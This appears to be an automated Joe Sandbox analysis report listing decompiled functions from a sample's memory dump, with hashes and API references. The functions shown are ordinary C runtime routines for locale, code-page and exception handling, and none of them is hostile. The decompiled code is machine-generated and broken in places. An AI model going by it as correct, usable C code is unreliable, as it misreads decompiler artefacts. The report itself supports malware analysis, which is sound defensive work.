Instruction ID: 387d59390e35fd6a6c659045463dcd92bb95daee8c7bdcc016c56954f0937ba9
Opcode Fuzzy Hash: 81644d65022bd89b17918896312dd43e41dec6dae42684c18ab8c3ec36d77c5f
Instruction Fuzzy Hash: AE515371A0030AABEF20FFA9CC44ABE77BCFF58708F144569EA15E7194E77099448B61

Uniqueness

Uniqueness Score: -1.00%

Function 0138F384 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E0138F384(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				void* _t88;
				intOrPtr* _t91;
				intOrPtr* _t95;
				short _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E01385D71(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E0138F317(0x1398640, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E0138EC88(_t84, _t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E0138EDA8();
					} else {
						E0138ED0F(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E0138F317(0x1398330, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E0138EDA8();
							} else {
								E0138ED0F(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E0138F1D4(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x6
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // 0x3
							_t47 = E0138C52A(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E0138016C();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x13a3014; // 0x98b2b77b
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E01385D71(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E01385D71(_t97, _t114) + 0x34c);
								_t127 = E0138FABF(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E0138C275(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E0138FBF1(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t88);
								return E01377F14(_t62, _t88, _v32 ^ _t130, _t114, _t121, _t128);
							} else {
								if(E013884AC(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E013884AC(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_t68 = E0139350B(_t86, 0x5f);
										_pop(_t97);
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E013884AC(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_t73 = E0139350B(_t86, 0x2e);
											_pop(_t97);
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E013921FE(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E0138C52A(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x0138f389
0x0138f38a
0x0138f38c
0x0138f391
0x0138f398
0x0138f39a
0x0138f39d
0x0138f39d
0x0138f3a0
0x0138f3a0
0x0138f3a6
0x0138f3a9
0x0138f3ac
0x0138f3ac
0x0138f3af
0x0138f3b2
0x0138f3b4
0x0138f3ba
0x0138f3bc
0x0138f3c1
0x0138f3cb
0x0138f3d0
0x0138f3d2
0x0138f3d5
0x0138f3d5
0x0138f3d7
0x0138f3db
0x0138f424
0x00000000
0x0138f3dd
0x0138f3e2
0x0138f3eb
0x0138f3e4
0x0138f3e4
0x0138f3e4
0x0138f3f6
0x0138f400
0x0138f405
0x0138f40a
0x0138f410
0x0138f414
0x0138f41d
0x0138f416
0x0138f416
0x0138f416
0x0138f429
0x0138f429
0x0138f40a
0x0138f3f6
0x0138f42f
0x0138f56b
0x0138f56b
0x00000000
0x0138f435
0x0138f435
0x0138f43e
0x0138f44f
0x0138f445
0x0138f445
0x0138f445
0x0138f456
0x0138f45a
0x00000000
0x0138f47e
0x0138f47e
0x0138f483
0x0138f485
0x0138f485
0x0138f487
0x0138f48c
0x0138f566
0x0138f568
0x0138f56d
0x0138f571
0x0138f492
0x0138f492
0x0138f495
0x0138f495
0x0138f49d
0x0138f4a0
0x0138f4a0
0x0138f4a3
0x0138f4a3
0x0138f4a6
0x0138f4a9
0x0138f4b3
0x0138f4bd
0x0138f4c2
0x0138f4c7
0x0138f572
0x0138f574
0x0138f575
0x0138f576
0x0138f577
0x0138f578
0x0138f579
0x0138f57e
0x0138f582
0x0138f58a
0x0138f591
0x0138f594
0x0138f595
0x0138f599
0x0138f59a
0x0138f59f
0x0138f5a7
0x0138f5b6
0x0138f5c2
0x0138f5d3
0x0138f5db
0x0138f5f5
0x0138f602
0x0138f605
0x0138f608
0x0138f608
0x0138f612
0x0138f5dd
0x0138f5dd
0x0138f5df
0x0138f5df
0x0138f618
0x0138f619
0x0138f61c
0x0138f623
0x0138f4cd
0x0138f4dd
0x00000000
0x0138f4e3
0x0138f4e5
0x0138f4e5
0x0138f4f1
0x0138f4ff
0x00000000
0x0138f501
0x0138f504
0x0138f50a
0x0138f50d
0x0138f51d
0x0138f522
0x0138f530
0x00000000
0x00000000
0x00000000
0x00000000
0x0138f50f
0x0138f512
0x0138f518
0x0138f51b
0x0138f532
0x0138f532
0x0138f53e
0x0138f55e
0x00000000
0x0138f540
0x0138f540
0x0138f54a
0x0138f54f
0x0138f554
0x00000000
0x0138f556
0x00000000
0x0138f556
0x0138f554
0x00000000
0x00000000
0x00000000
0x0138f51b
0x0138f50d
0x0138f4ff
0x0138f4dd
0x0138f4c7
0x0138f48c
0x0138f45a

APIs

Part of subcall function 01385D71: GetLastError.KERNEL32(?,00000000,?,0137D1A2,00000000,00000000,?,?,01388943,00000000,00000000,00000000,00000000,?), ref: 01385D76
Part of subcall function 01385D71: SetLastError.KERNEL32(00000000,00000002,000000FF,?,01388943,00000000,00000000,00000000,00000000,?), ref: 01385E14

GetACP.KERNEL32(?,?,?,?,?,?,01383BC4,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0138F445
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,01383BC4,?,?,?,00000055,?,-00000050,?,?), ref: 0138F470
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0138F5D3

Strings

utf8, xrefs: 0138F542

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: def337290fe2d899983fede58563d30b32dcd0c6f224e641e331540af4fe7655
Instruction ID: 39636f4d8915a6a0eca5a29e3ddc4c7668cf3ef13778217980c60535a969b914
Opcode Fuzzy Hash: def337290fe2d899983fede58563d30b32dcd0c6f224e641e331540af4fe7655
Instruction Fuzzy Hash: BB710571600706AAEB25BF3DCC45BBA77ACEF58718F14447AEA05EB180FB74E9418760

Uniqueness

Uniqueness Score: -1.00%

Function 013784C9 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E013784C9(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E0137868D(_t34);
				 *_t60 = 0x2cc;
				_v632 = E01379180(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E01379180(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E0137868D(_t49);
				}
				return _t49;
			}

0x013784c9
0x013784c9
0x013784c9
0x013784dd
0x013784df
0x013784e2
0x013784e2
0x013784e6
0x013784eb
0x01378503
0x01378509
0x0137850f
0x01378515
0x0137851b
0x01378521
0x01378527
0x0137852e
0x01378535
0x0137853c
0x01378543
0x0137854a
0x01378551
0x01378552
0x0137855b
0x01378561
0x01378564
0x0137856a
0x01378579
0x01378585
0x01378590
0x01378597
0x0137859e
0x013785a9
0x013785b1
0x013785ba
0x013785bc
0x013785bf
0x013785c1
0x013785cb
0x013785d3
0x013785d9
0x00000000
0x013785e0
0x013785e3

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 013784D5
IsDebuggerPresent.KERNEL32 ref: 013785A1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 013785C1
UnhandledExceptionFilter.KERNEL32(?), ref: 013785CB

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 5a3d4ed13d89e6cf8cd1922739787f6a4bb3923eb932fc167abad1533454b0b5
Instruction ID: dc4e6c52e541d4a05644dd264a609e989b1594d6d4230ef54420b3a6dc185833
Opcode Fuzzy Hash: 5a3d4ed13d89e6cf8cd1922739787f6a4bb3923eb932fc167abad1533454b0b5
Instruction Fuzzy Hash: 50312575D052189BDB21DFA4D989BCCBBB8AF08304F1041EAE50CAB240EB799A85DF44

Uniqueness

Uniqueness Score: -1.00%

Function 01381D9B Relevance: 22.9, APIs: 15, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E01381D9B(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				signed int* _v76;
				signed int** _v80;
				signed int** _v84;
				void* _v88;
				char _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t126;
				signed int* _t129;
				intOrPtr* _t131;
				signed int* _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				signed int* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				signed int* _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t213;
				intOrPtr _t217;
				signed int* _t221;
				intOrPtr _t222;
				signed int _t223;
				void* _t227;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				signed int* _t235;
				signed char* _t236;
				signed int** _t239;
				signed int** _t240;
				signed char* _t249;
				void* _t251;
				intOrPtr* _t252;
				void* _t255;
				signed int _t256;
				short* _t257;
				signed int _t260;
				signed int _t261;
				void* _t262;
				void* _t263;

				_t233 = __edx;
				_t126 =  *0x13a3014; // 0x98b2b77b
				_v8 = _t126 ^ _t261;
				_t252 = _a4;
				_t205 = 0;
				_v56 = _t252;
				_t237 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t252 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t252;
				_v88 = 0;
				if(_t213 == 0) {
					__eflags =  *(_t252 + 0x8c);
					if( *(_t252 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t252 + 0x8c) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *(_t252 + 0x90) = _t205;
					 *_t252 = 0x13969a0;
					 *(_t252 + 0x94) = 0x1396c20;
					 *(_t252 + 0x98) = 0x1396da0;
					 *(_t252 + 4) = 1;
					L48:
					return E01377F14(_t129, _t205, _v8 ^ _t261, _t233, _t237, _t252);
				}
				_t131 = _t252 + 8;
				_v52 = 0;
				if( *_t131 != 0) {
					L3:
					_v52 = E013858A2(1, 4);
					E013871B2(_t205);
					_v32 = E013858A2(0x180, 2);
					E013871B2(_t205);
					_t237 = E013858A2(0x180, 1);
					_v44 = _t237;
					E013871B2(_t205);
					_v36 = E013858A2(0x180, 1);
					E013871B2(_t205);
					_v40 = E013858A2(0x101, 1);
					E013871B2(_t205);
					_t263 = _t262 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
						E013871B2(_v52);
						E013871B2(_v32);
						E013871B2(_t237);
						E013871B2(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *(_t147 + _t217) = _t147;
								_t147 =  &(_t147[0]);
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t252 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t237 + 0x81; // 0x81
								_t233 = 0xff;
								_v48 = _v40 + 1;
								_t153 = E01387F34(_t281, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t282 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
								_t156 = E01387F34(_t282, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t283 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = E0138B3FB(_t283, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t233 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t239 = _t233 + 0x80;
								 *(_t233 + 0x7f) = _t205;
								_v80 = _t239;
								 *(_t222 + 0x7f) = _t205;
								 *_t239 = _t205;
								_t240 = _t222 + 0x80;
								_v84 = _t240;
								 *_t240 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									asm("movsw");
									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
									_t227 = 0x1f;
									asm("movsw");
									asm("movsb");
									_t255 = _t164 + 0x100;
									_t165 = memcpy(_t164, _t255, 0 << 2);
									_t237 = _t255 + _t227 + _t227;
									asm("movsw");
									asm("movsb");
									_t252 = _v56;
									if( *(_t252 + 0x8c) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E013871B2( *(_t252 + 0x90) - 0xfe);
											_t237 = 0x80;
											E013871B2( *(_t252 + 0x94) - 0x80);
											E013871B2( *(_t252 + 0x98) - 0x80);
											E013871B2( *(_t252 + 0x8c));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *(_t252 + 0x8c) = _t166;
									 *_t252 = _v72;
									 *(_t252 + 0x90) = _v76;
									 *(_t252 + 0x94) = _v80;
									 *(_t252 + 0x98) = _v84;
									 *(_t252 + 4) = _v60;
									L44:
									E013871B2(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t252 + 8) != 0xfde9) {
									_t249 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t249[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t256 =  *_t249 & 0x000000ff;
										_v64 = _t256;
										__eflags = _t256 - (_t183 & 0x000000ff);
										if(_t256 > (_t183 & 0x000000ff)) {
											L37:
											_t249 =  &(_t249[2]);
											__eflags =  *_t249;
											if( *_t249 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t233;
										_t186 = _t222 + 0x80 + _t256;
										_t235 = _t233 - _t222;
										__eflags = _t235;
										_t230 = _v64;
										_t257 = _t207 - 0xffffff00 + _t256 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t257 = 0x8000;
											_t257 = _t257 + 2;
											 *(_t235 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t249[1] & 0x000000ff);
										} while (_t230 <= (_t249[1] & 0x000000ff));
										_t233 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t233 + 0x100;
								_t251 = _t222 - _t233;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t233;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t251 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t281 =  *(_t252 + 8) - 0xfde9;
							if( *(_t252 + 8) != 0xfde9) {
								_t236 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t236[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t260 =  *_t236 & 0x000000ff;
									__eflags = _t260 - (_t197 & 0x000000ff);
									if(_t260 > (_t197 & 0x000000ff)) {
										L20:
										_t236 =  &(_t236[2]);
										__eflags =  *_t236 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t260 + _t232)) = 0x20;
										_t260 = _t260 + 1;
										__eflags = _t260 - (_t236[1] & 0x000000ff);
									} while (_t260 <= (_t236[1] & 0x000000ff));
									goto L20;
								}
								_t252 = _v56;
								goto L22;
							}
							E01379180(_t237, _v40 - 0xffffff80, 0x20, 0x80);
							_t263 = _t263 + 0xc;
							goto L22;
						}
					}
				}
				_push(_t131);
				_push(0x1004);
				_push(_t213);
				_push(0);
				_push( &_v92);
				_t204 = E0138B24B(__edx);
				_t263 = _t262 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}

0x01381d9b
0x01381da3
0x01381daa
0x01381daf
0x01381db2
0x01381db5
0x01381db8
0x01381dba
0x01381dbd
0x01381dc3
0x01381dc6
0x01381dc9
0x01381dcc
0x01381dd1
0x013821b4
0x013821b6
0x013821b8
0x013821b8
0x013821bb
0x013821c1
0x013821c1
0x013821c3
0x013821c9
0x013821cf
0x013821d9
0x013821e3
0x013821ea
0x013821f8
0x013821f8
0x01381dd7
0x01381dda
0x01381ddf
0x01381dfd
0x01381e07
0x01381e0a
0x01381e1d
0x01381e20
0x01381e2d
0x01381e30
0x01381e33
0x01381e45
0x01381e48
0x01381e5a
0x01381e5d
0x01381e62
0x01381e68
0x0138217d
0x01382180
0x01382188
0x0138218e
0x01382196
0x013821a0
0x013821a0
0x00000000
0x01381e77
0x01381e77
0x01381e7c
0x00000000
0x01381e93
0x01381e93
0x01381e95
0x01381e95
0x01381e98
0x01381e99
0x01381eaf
0x00000000
0x00000000
0x01381eb5
0x01381ebb
0x00000000
0x00000000
0x01381ec1
0x01381ec4
0x01381eca
0x01381f20
0x01381f23
0x01381f2d
0x01381f42
0x01381f46
0x01381f4b
0x01381f4e
0x01381f50
0x00000000
0x00000000
0x01381f79
0x01381f7e
0x01381f81
0x01381f83
0x00000000
0x00000000
0x01381f9e
0x01381fa4
0x01381fa9
0x01381fae
0x00000000
0x00000000
0x01381fb4
0x01381fbd
0x01381fc3
0x01381fc6
0x01381fc9
0x01381fcc
0x01381fcf
0x01381fd5
0x01381fd8
0x01381fdb
0x01381fde
0x01381fe0
0x01381fe6
0x01381fe9
0x01381feb
0x013820bb
0x013820c2
0x013820c3
0x013820ce
0x013820d3
0x013820dd
0x013820df
0x013820e0
0x013820e2
0x013820e3
0x013820eb
0x013820eb
0x013820ed
0x013820ef
0x013820f0
0x013820fb
0x01382100
0x01382104
0x01382112
0x0138211d
0x01382125
0x01382133
0x0138213e
0x01382143
0x01382104
0x01382146
0x01382149
0x0138214f
0x01382158
0x0138215d
0x01382166
0x0138216f
0x01382178
0x013821a1
0x013821a4
0x013821aa
0x00000000
0x013821aa
0x01381ff8
0x01382051
0x01382054
0x01382057
0x00000000
0x00000000
0x01382059
0x0138205c
0x0138205c
0x0138205f
0x01382061
0x00000000
0x00000000
0x01382063
0x01382069
0x0138206c
0x0138206e
0x013820b1
0x013820b1
0x013820b4
0x013820b7
0x00000000
0x00000000
0x00000000
0x013820b7
0x01382076
0x0138207f
0x01382081
0x01382081
0x01382083
0x01382086
0x01382089
0x0138208c
0x0138208e
0x01382093
0x01382096
0x01382099
0x0138209c
0x0138209e
0x013820a3
0x013820a4
0x013820a4
0x013820a8
0x013820ab
0x013820ae
0x00000000
0x013820ae
0x013820b9
0x013820b9
0x00000000
0x013820b9
0x01382001
0x01382004
0x01382011
0x01382013
0x01382018
0x0138201b
0x0138201e
0x01382026
0x01382028
0x01382036
0x01382039
0x0138203c
0x0138203f
0x01382041
0x01382044
0x01382048
0x00000000
0x0138204f
0x01381ecc
0x01381ed3
0x01381eed
0x01381ef0
0x01381ef3
0x00000000
0x00000000
0x01381ef5
0x01381ef8
0x01381ef8
0x01381efb
0x01381efd
0x00000000
0x00000000
0x01381eff
0x01381f05
0x01381f07
0x01381f16
0x01381f16
0x01381f19
0x01381f1b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01381f09
0x01381f09
0x01381f09
0x01381f0d
0x01381f12
0x01381f12
0x00000000
0x01381f09
0x01381f1d
0x00000000
0x01381f1d
0x01381ee3
0x01381ee8
0x00000000
0x01381ee8
0x01381e7c
0x01381e68
0x01381de1
0x01381de2
0x01381de7
0x01381deb
0x01381dec
0x01381ded
0x01381df2
0x01381df7
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 01381E0A
_free.LIBCMT ref: 01381E20
_free.LIBCMT ref: 01381E33
_free.LIBCMT ref: 01381E48
_free.LIBCMT ref: 01381E5D
GetCPInfo.KERNEL32(?,?), ref: 01381EA7

Part of subcall function 0138B24B: _free.LIBCMT ref: 0138B2B6

_free.LIBCMT ref: 01382112
_free.LIBCMT ref: 01382125
_free.LIBCMT ref: 01382133
_free.LIBCMT ref: 0138213E
_free.LIBCMT ref: 01382180
_free.LIBCMT ref: 01382188
_free.LIBCMT ref: 0138218E
_free.LIBCMT ref: 01382196
_free.LIBCMT ref: 013821A4

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 6811c10400d9ae9b53ee35876bb08317097062cd5bbb6d322b1e2599cc05a6c6
Instruction ID: 05384ea2674affc942459890606c25b161ba64b1467adb83678d56c2b16de0bc
Opcode Fuzzy Hash: 6811c10400d9ae9b53ee35876bb08317097062cd5bbb6d322b1e2599cc05a6c6
Instruction Fuzzy Hash: 18D1A271D0030A9FDB21EFB8C880BEEBBF6BF58308F544169E995A7251D771A845CB60

